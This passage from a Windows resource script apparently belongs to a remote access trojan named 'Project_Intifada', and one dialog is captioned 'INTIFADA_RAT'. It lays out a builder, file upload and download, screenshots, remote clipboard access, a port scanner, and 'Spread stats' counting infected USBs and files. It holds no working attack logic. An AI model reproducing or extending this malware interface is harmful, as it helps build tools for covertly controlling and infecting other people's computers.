    EDITTEXT        IDC_FILE,25,35,180,15,ES_AUTOHSCROLL
    PUSHBUTTON      "Browse...",IDC_BROWSE,210,35,50,15
    //CONTROL         "Create backup copy (*.bak)",IDC_BACKUP,"Button",
     //               BS_AUTOCHECKBOX | WS_TABSTOP,5,55,105,8
    CONTROL         "Add icon",IDC_ADDICON,"Button",BS_AUTOCHECKBOX |
                    WS_TABSTOP,115,55,40,8
    ICON            IDI_EXE,IDC_ICONIMG,160,55,20,20
    PUSHBUTTON      "Build",IDC_BUILD,5,70,50,15
    //PUSHBUTTON      "About",IDC_ABOUT,60,70,50,15
    //PUSHBUTTON      "Exit",IDC_EXIT,210,70,50,15
END*/



NEW_FOLDER_DLG DIALOG DISCARDABLE 130,50,200,65
STYLE DS_MODALFRAME | WS_POPUP | WS_CAPTION | WS_SYSMENU

CAPTION "New folder"
FONT 8, "Tahoma"
BEGIN

    LTEXT           "Folder Name:",IDC_STATIC,5,18,50,8
    EDITTEXT        IDC_FOLDER_NAME,55,18,100,12,ES_AUTOHSCROLL
    PUSHBUTTON      "Ok",IDC_OK_FOLDER_NAME,80,33,50,15

END


DLOAD_STAT_DLG DIALOGEX 130,50,200,65
STYLE DS_MODALFRAME | WS_POPUPWINDOW //| WS_CAPTION | WS_SYSMENU

CAPTION "File download"
FONT 8, "Tahoma"
BEGIN

    //CONTROL         "Status:",IDC_DLSTAT,"EDIT", ES_READONLY |
    //                WS_TABSTOP,80,33,50,15,WS_EX_CLIENTEDGE
    CONTROL         "Cancel",IDC_CANCEL_DLOAD,"Button",0x10010000,125,38,50,15,WS_EX_CLIENTEDGE
    CONTROL         "Pause",IDC_PAUSE_DLOAD,"Button",0x10010000,25,38,50,15,WS_EX_CLIENTEDGE
    CONTROL         "Resume",IDC_RESUME_DLOAD,"Button",0x10010000,75,38,50,15,WS_EX_CLIENTEDGE
    CONTROL         "Progress1",IDC_DLPROGRESS,"msctls_progress32",PBS_SMOOTH,
                    5,10,190,13,WS_EX_CLIENTEDGE
    LTEXT           "STATUS: ",IDC_DLSTATIC,5,27,120,8

END




ULOAD_STAT_DLG DIALOGEX 130,50,200,60
STYLE DS_MODALFRAME | WS_POPUPWINDOW //| WS_CAPTION | WS_SYSMENU

CAPTION "File upload"
FONT 8, "Tahoma"
BEGIN

    //CONTROL         "Status:",IDC_DLSTAT,"EDIT", ES_READONLY |
    //                WS_TABSTOP,80,33,50,15,WS_EX_CLIENTEDGE
    CONTROL         "Cancel",IDC_CANCEL_ULOAD,"Button",0x10010000,125,38,50,15,WS_EX_CLIENTEDGE
    //CONTROL         "Pause",IDC_PAUSE_ULOAD,"Button",0x10010000,25,38,50,15,WS_EX_CLIENTEDGE
    //CONTROL         "Resume",IDC_RESUME_DLOAD,"Button",0x10010000,75,38,50,15,WS_EX_CLIENTEDGE
    CONTROL         "Progress4",IDC_ULPROGRESS,"msctls_progress32",PBS_SMOOTH,
                    5,10,190,13,WS_EX_CLIENTEDGE
    LTEXT           "Status: ",IDC_ULSTATIC,5,27,120,8

END



SHOT_STAT_DLG DIALOGEX 130,50,200,65
STYLE DS_MODALFRAME | WS_POPUP | WS_CAPTION | WS_SYSMENU

CAPTION "INTIFADA_RAT"
FONT 8, "Tahoma"
BEGIN

    CONTROL         "Cancel",IDC_CANCEL_SHOT,"Button",0x10010000,125,38,50,15,WS_EX_CLIENTEDGE

END






STATISTICS_DLG DIALOG DISCARDABLE 290,40,295,130
STYLE DS_MODALFRAME | WS_POPUP | WS_CAPTION | WS_SYSMENU

CAPTION "Statistics"
FONT 8, "Tahoma"
BEGIN

    GROUPBOX        "Data Transfer",IDC_STATIC,1,2,130,65
    LTEXT           "Uploads: ",IDC_UPLKBSTATIC,25,10,60,8
    LTEXT           "Total uploads: ",IDC_TLUPLKBSTATIC,25,20,100,8
    LTEXT           "Download: ",IDC_DLKBSTATIC,25,45,60,8
    LTEXT           "Total downloads: ",IDC_TLDLKBSTATIC,25,55,100,8

    GROUPBOX        "File stats",IDC_STATIC,140,2,150,65
    LTEXT           "Total files Uploaded: ",IDC_UPLLFILESTATIC,165,10,120,8
    LTEXT           "Total size: ",IDC_UPLLFILESIZESTATIC,165,20,120,8
    LTEXT           "Total files Downloaded: ",IDC_DLFILESTATIC,165,45,120,8
    LTEXT           "Total size: ",IDC_DLFILESIZESTATIC,165,55,120,8

    //CONTROL         "Reset",IDC_RESET_DATASTAT,"Button",0x10010000,150,52,50,15,WS_EX_CLIENTEDGE
    GROUPBOX        "Connections",IDC_STATIC,2,70,130,45
    LTEXT           "Active connections: ",IDC_ACCONSTATIC,25,80,90,8
    LTEXT           "All connections: ",IDC_ALLCONSTATIC,25,90,90,8

    GROUPBOX        "Spread stats",IDC_STATIC,140,70,150,45
    //LTEXT           "Infected PCs: ",IDC_INFPCSTATIC,5,130,120,8
    LTEXT           "Infected USBs: ",IDC_INFUSBSTATIC,165,80,80,8
    LTEXT           "Infected files: ",IDC_INFFILESTATIC,165,100,80,8
    //CONTROL         "Reset",IDC_RESET_SPREADSTAT,"Button",0x10010000,150,169,50,15,WS_EX_CLIENTEDGE

    //CONTROL         "Reset",IDC_RESET_FILESTAT,"Button",0x10010000,150,240,50,15,WS_EX_CLIENTEDGE
    PUSHBUTTON      "Reset all",IDC_REST_ALLSTATS,5,120,50,15
    ICON             IDI_EXT_MAIN,IDC_EXT_STAT,270,125,50,100


END





BROWSE_WEB_DLG DIALOG DISCARDABLE 130,50,210,65
STYLE DS_MODALFRAME | DS_CENTERMOUSE | WS_POPUP | WS_CAPTION | WS_SYSMENU

CAPTION "Browse webpage"
FONT 8, "Tahoma"
BEGIN

    LTEXT           "URL:",IDC_STATIC,5,15,50,8
    EDITTEXT        IDC_URL_EDIT,23,13,170,12,ES_AUTOHSCROLL
    PUSHBUTTON      "GO",IDC_URL_GO,80,33,50,15

END




HOST_INFO_DLG DIALOG DISCARDABLE 390,190,280,150
STYLE DS_MODALFRAME | WS_POPUP | WS_CAPTION | WS_SYSMENU

CAPTION "System information"
FONT 8, "Tahoma"
BEGIN

    //LTEXT           "URL:",IDC_STATIC,5,15,50,8
    EDITTEXT        IDC_HOSTINFO_EDIT,1,10,278,130,ES_AUTOHSCROLL|ES_READONLY
    ICON            IDI_QUESTIONX,IDC_GRAB_HOSTINFO,10,150,50,15
    ICON            IDI_INFOX,IDC_EXIT_HOSTINFO,245,150,50,15
END




AUTH_FAIL_DLG DIALOG DISCARDABLE 130,50,200,65
STYLE DS_MODALFRAME | DS_CENTERMOUSE | WS_POPUP | WS_CAPTION | WS_SYSMENU

CAPTION "Authentication failed"
FONT 8, "Tahoma"
BEGIN

    //LTEXT           "Try manually",IDC_STATIC,5,10,150,8
    LTEXT           "Enter password",IDC_STATIC,3,19,50,8
    EDITTEXT        IDC_RE_AUTH,55,18,100,12,ES_AUTOHSCROLL|ES_PASSWORD
    PUSHBUTTON      "OK",IDC_OK_RE_AUTH,80,33,50,15

END




SCAN_PORT_DLG DIALOGEX 6, 3, 330, 250

    STYLE DS_MODALFRAME | WS_MINIMIZEBOX | WS_POPUP | WS_CAPTION | WS_SYSMENU

CAPTION "Port scanner"

FONT 8, "Tahoma"

BEGIN

  CONTROL "List11",  IDC_LIST11,"SysListView32",LVS_REPORT|
                     LVS_SHOWSELALWAYS |WS_TABSTOP,1,1,325,180,WS_EX_CLIENTEDGE
  LTEXT           "Start IP:",IDC_STATIC,8,192,30,14
  LTEXT           "End   IP:",IDC_STATIC,8,212,30,14
  CONTROL         "",IDC_IP_START,"SysIPAddress32",WS_TABSTOP,40,190,103,14
  CONTROL         "",IDC_IP_END,"SysIPAddress32",WS_TABSTOP,40,210,103,14
  LTEXT           "Start Port:",IDC_STATIC,170,192,35,11
  LTEXT           "End  Port:",IDC_STATIC,170,212,35,11
  EDITTEXT        IDC_START_PORT,215,190,55,15,ES_AUTOHSCROLL | ES_NUMBER
  EDITTEXT        IDC_END_PORT,215,210,55,15,ES_AUTOHSCROLL | ES_NUMBER
  PUSHBUTTON      "Start Scan",IDC_START_SCAN,215,234,50,15
  CONTROL         "Show Only active ports",IDC_SHOWACTIVE_PORT,"Button",BS_AUTOCHECKBOX |
                  WS_TABSTOP,8,239,90,8

END







CLIP_BOARD_DLG DIALOGEX 6, 3, 330, 200

    STYLE DS_MODALFRAME | WS_MINIMIZEBOX | WS_POPUP | WS_CAPTION | WS_SYSMENU

CAPTION "Remote clipboard"

FONT 8, "Tahoma"

BEGIN

  CONTROL "List12",  IDC_LIST12,"SysListView32",LVS_REPORT|
                     LVS_SHOWSELALWAYS |WS_TABSTOP,1,1,325,180,WS_EX_CLIENTEDGE


END




WRITE_CBOARD_DLG DIALOG DISCARDABLE 130,50,160,65
STYLE DS_MODALFRAME | WS_POPUP | WS_CAPTION | WS_SYSMENU

CAPTION "Write on remote clipboard"
FONT 8, "Tahoma"
BEGIN

    EDITTEXT        IDC_PASTE_CBEDT,5,12,150,14,ES_AUTOHSCROLL
    PUSHBUTTON      "Paste",IDC_PASTE_CBBTN,55,33,40,15

END






1 24 "manifest2.xml"


/////////////////////////////////////////////////////////////////////////////
//
// Version
//

VS_VERSION_INFO VERSIONINFO
 FILEVERSION 1,0,0,0
 PRODUCTVERSION 1,0,0,0
 FILEFLAGSMASK 0x3fL
#ifdef _DEBUG
 FILEFLAGS 0x1L
#else
 FILEFLAGS 0x0L
#endif
 FILEOS 0x40004L
 FILETYPE 0x1L
 FILESUBTYPE 0x0L
BEGIN
    BLOCK "StringFileInfo"
    BEGIN
        BLOCK "100904b0"
        BEGIN
            VALUE "Comments", "\0"
            VALUE "CompanyName", " www.projectintifada.com\0"
            VALUE "FileDescription", "Project_Intifada Beta\0"
            VALUE "FileVersion", "1, 0, 0, 0\0"
            VALUE "InternalName", "Project_Intifada \0"
            VALUE "LegalCopyright", "Copyright © 2013\0"
            VALUE "LegalTrademarks", "\0"
            VALUE "OriginalFilename", "Project_Intifada.exe\0"
            VALUE "PrivateBuild", "\0"
            VALUE "ProductName", "  Project_Intifada \0"
            VALUE "ProductVersion", "1, 0, 2, 0\0"
            VALUE "SpecialBuild", "\0"
        END
    END
    BLOCK "VarFileInfo"
    BEGIN
        VALUE "Translation", 0x1009, 1200
    END
END
